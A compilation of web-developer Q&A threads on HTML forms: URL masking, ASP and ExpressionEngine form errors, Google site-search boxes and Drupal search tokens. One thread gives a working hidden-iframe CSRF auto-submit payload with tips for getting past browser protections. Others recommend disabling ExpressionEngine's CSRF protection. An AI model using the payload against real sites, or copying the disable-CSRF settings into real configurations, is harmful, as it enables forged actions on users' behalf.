I have tried iframing but it doesn't worked in Javascript disabled browser. Anyone please tell me how can I mask an url and still worked in Javascript disabled situation, thanks in advance.
Use POST, rather than GET. Something like this early in the page:
<form action="nextpage" method="post">
<input type="hidden" name="parameter1" value="value1" />
...etc...
This page
</form>
<form action="otherpage" method="post">
<input type="hidden" name="parameter1" value="value1" />
...etc...
That page
</form>
Bit more longwinded, but it will work.
Related
I'm new to ASP very recently and I can't seem to get this to work
<html>
<body>
<form action="test.asp" method="post">
<input type="text" name="text" />
<input type="submit" value="submit" />
</form>
<%
dim x
x=Request.Form("text")
Responce.Write(x)
%>
</body>
</html>
The text box and submit button are displayed however this error is displayed and this ASP does not work.I'm not sure if something is wrong with my code or IIS. Any help on this would be much appreciated
An error occurred on the server when processing the URL. Please contact the system administrator.
If you are the system administrator please click here to find out more about this error.
Could be you have a typo:
Responce.Write(x)
should be:
Response.Write(x)
If you just need to print your "text" variable:
<html>
<body>
<form action="test.asp" method="post">
<input type="text" name="text" />
<input type="submit" value="submit" />
</form>
<%=Request.Form("text")%>
</body>
</html>
I've got a problem with the contact form in Expression Engine. I'm using the code from the docs but after submitting I'm getting this error :
This form has expired. Please refresh and try again.
My code:
{exp:email:contact_form user_recipients="no" recipients="my#emailadress.com" charset="utf-8"}
<h2>Support Form</h2>
<p>
<label for="from">Your Email:</label><br />
<input type="text" id="from" name="from" size="40" maxlength="35" value="{member_email}" />
</p>
<p>
<label for="subject">Subject:</label><br />
<input type="text" id="subject" name="subject" size="40" value="Contact Form" />
</p>
<p>
<label for="message">Message:</label><br />
<textarea id="message" name="message" rows="18" cols="40">
Support Email from: {member_name}
Sent at: {current_time format="%Y %m %d"}
</textarea>
</p>
<p>
<input name="submit" type='submit' value='Submit Form' />
</p>
{/exp:email:contact_form}
I'm using Expression Engine 2.8.0. Thanks guys!
EE requires an XID to be in the form. There is a global variable you can use to generate an XID hash:
<input type="hidden" name="XID" value="{XID_HASH}" />
http://ellislab.com/blog/entry/putting-the-secure-in-secure-mode-forms
For us, adding this to the config.php 'fixed' the problem (more like, put a bandaid on it since it's not an ideal situation)
$config[‘disable_csrf_protection’] = “y”;
I was having this problem only in Chrome and not in Firefox or Safari. I dug into the PHP and realized that it failed this check in Csrf.php:
// Fetch data, these methods enforce token time limits
$this->fetch_session_token();
$this->fetch_request_token();
// Main check
if ($this->request_token === $this->session_token)
{
return TRUE;
}
Then I realized that I had set Chrome to block cookies. I set it so Chrome would allow cookies and I am no longer getting that error message.
I think that's a problem with the secure forms XID hash. You can only submit a form once while using "secure forms" (to stop spammers hijacking them).
A quick way of disabling it is to open system/expressionengine/config/config.php and add this down the bottom to disable it. See if that makes a difference for you.
$config["secure_forms"] = "n";
Obviously using secure forms is preferable though.
I'm interested in knowing how it is possible to silently submit a POST form for CSRF, without the user having any notice (the document location being redirected to the POSTed URL is not silent).
Example:
<form method='POST' action='http://vulnerablesite.com/form.php'>
<input type='hidden' name='criticaltoggle' value='true'
<input type='submit' value='submit'>
</form>
On an external site, what would I need to do to trigger this form automatically and silently?
One solution would be to open the form’s action in a frame like an iframe:
<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
When testing CSRF locally you may have to overcome several security measures.
For Blocked loading mixed active content errors, ensure the protocol (http/https) of the attacker site and target site are the same, or use "//" as protocol for attacker site. Example attack on localhost:
<iframe style="display:none" id="csrf-frame-invisible" name="csrf-frame-invisible"></iframe>
<form style="display:none" method='POST' action='//localhost:4000' target="csrf-frame-invisible" name="csrf-form-invisible" id="csrf-form-invisible">
<input type='hidden' name='boo' value='true'>
<input type='submit' value='Submit'>
</form>
Alternatively set Firefox security.mixed_content.block_active_content to false.
If using Angular, security options prevent you using inline javascript, so you'll need to move the submit to code-behind on the attacker site:
ngOnInit() {
const myForm: HTMLFormElement = document.getElementById('csrf-form-invisible') as HTMLFormElement;
myForm.submit();
}
Finally the attacker site's header 'x-frame-options' must not be set.
I want to make a simple searchbox in my website. I think for my situation, the best way is to use something like w3schools.com did. When user types smth and press enter it redirects to google.com/search and it will search from only w3schools.com in google because there is site:www.w3schools.com is given in url. how can i do that?
A simple solution would be something like this:
<html>
<head></head>
<body>
<form method="get" name="searchform" action="http://www.google.com/search" target="_blank">
<input type="hidden" name="sitesearch" value="stackoverflow.com">
<input type="text" name="as_q" size="20" value="Search stackoverflow.com">
<input type="submit" value="Search" title="Search">
</form>
</body>
</html>
But you should also check this out:
http://www.google.com/cse/
Just browse source code and take everything you need, that trick will often do in case of HTML how-to's:
<form method="get" name="searchform" action="http://www.google.com/search" target="_blank">
<input type="hidden" name="sitesearch" value="www.yoursite.com">
<input type="text" name="as_q" size="20" value="Search yoursite.com">
<input type="submit" value="Search" title="Search">
</form>
Well. Actually it seems this is quite easy job. I have found the solution At:
http://www.askdavetaylor.com/how_can_i_add_a_google_search_box_to_my_web_site.html/
I think what you are looking for is Google Custom Search Engine. Start here: http://www.google.com/cse/docs/ , http://www.google.com/cse/manage/all
I want to create a custom search box and use that to interact with Drupal's search module. Currently everything works pretty well. However, i would also need to use a proper token with the search. I have no idea what key Drupal uses to form this token.
Currently i have:
<form class="search-form" action="/search/node" method="post" id="search-form" accept-charset="UTF-8">
<input type="text" name="keys" class="search_box" value="Search ..." />
<input type="hidden" name="form_id" id="search-form" value="search_theme_form" />
<input type="hidden" name="form_token" value="<?php print drupal_get_token('search_theme_form'); ?>" />
</form>
This works well enough to display the results of one page. If i try to navigate to the second results page, all the results are thrown away.
You should probably use the more proper
$form = drupal_get_form('search_block_form');
return drupal_render($form);
http://api.drupal.org/api/drupal/modules--search--search.module/function/search_form/7
It turned out to be as simple as changing the form from post to get. Here's the html for a working solution.
<form class="search-form" action="/search/node" method="post" id="search-form" accept-charset="UTF-8">
<input type="text" name="keys" class="search_box" value="Search ..." />
</form>
You don't need to define tokens or anything of the sort.
And in theme use:
<?php
$form = drupal_get_form('search_block_form');
echo render($form);
?>